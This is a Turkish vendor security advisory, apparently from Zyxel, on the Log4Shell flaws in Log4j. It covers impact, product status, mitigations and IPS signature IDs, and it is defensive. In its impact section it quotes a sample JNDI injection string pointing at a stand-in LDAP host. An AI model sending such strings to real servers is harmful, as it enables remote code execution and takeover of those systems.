Güvenlik Açığı Bulunan log4j Paketi
Log4j, JAVA'da oturum açmak için yaygın olarak kullanılan açık kaynaklı bir projedir. Log4j, 2.x.x ile 2.14.x arasındaki sürümde uzaktan kod yerleştirilebildiği tespit edildi. (Ancak, log4j için yeni bir kötüye kullanım, CVE-2021-45046, 2.15'te de tespit edildi. Bu sebeple cihazınızı 2.17 sürümüne güncellemenizi öneririz). Bu, saldırganların dış kabuğu (Log4shell) kolayca kırmak için özel biçimli bir komut göndermesine olanak tanır.
Etkileri
Bu güvenlik açığı, log4j paketinin yaygın olarak kullanılması ve güvenlik açığının uzaktan çalıştırılabilmesi nedeniyle CVSS'de en yüksek puanı (10) almıştır. Eğer sunucu güvenlik açığı barındırıyorsa, saldırganlar log4j paketine komutlar (${jndi:ldap:// example.com/a}) gönderebilir ve kabuğun sunucuyu ele geçirmesini sağlayabilir. İstemci cihazınızın ele geçirilmiş olması sebebiyle, bir bot olarak kullanılabilir veya önemli dosyalarınızı fidye yazılımı ile şifreleyebilirler.
Log4Shell'e Karşı Zyxel Ürünleri
Zyxel, Apache Log4j'deki uzaktan kod çalıştırma (RCE) güvenlik açıklarının farkındadır ve güvenlik ürünlerinin tamamının etkilenmediğini onaylamaktadır[1]. Zyxel ATP/USG FLEX Serisi güvenlik duvarları, saldırıya karşı ağınızı korumak üzere birden fazla katman koruması sağlar.
Etkilerini Hafifletmek İçin:
İstemci Cihazınızda: Apache Log4j'nin en son sürümüne güncelleme yapmanızı öneririz. (>=2.17.0)
Ağınızda:
- Saldırı etkisini azaltmak için, güvenlik açığı bulunan uygulamaları gerekli olmadıkça Internet'te yayımlamayın, bu kısım oldukça önemlidir. Uygulamalara uzaktan erişim için VPN teknolojisinden yararlanın.
- IPS imzasının en son sürümüne güncelleyin ve ardından istemci cihazınızı korumak için IPS işlevini etkinleştirin. İstemci cihazınız SSL/TLS iletimi kullanıyorsa, daha fazla algılama için SSL incelemesini de (SSL Inspection) etkinleştirmelisiniz. Saldırı kötü niyetli IP adresinden geldiğinde, IP reputation özelliği size IP adres bazlı gelen ve gelecek olan saldırılara karşı koruma sağlar.
- DNS Filtreleme, URL Filtreleme, İçerik Filtreleme, AntiVirus ve Sandbox özelliklerini etkin şekilde kullanmak da, daha fazla saldırının önüne geçmek ve saldırı zincirini kırmak için önem teşkil eder.
Zyxel Security hakkında daha fazla bilgi
İmza Bilgileri;
ATP/USGFLEX serisi:
v4.0.x.20211217.0
# İmza Kimliği 131026, 131027 ve 131028, CVE-2021-44228 için kullanılır.
# CVE-2021-45046 için İmza Kimliği 131029 ve 131030 kullanılır.
More information >
Referans
Düzenleme Geçmişi
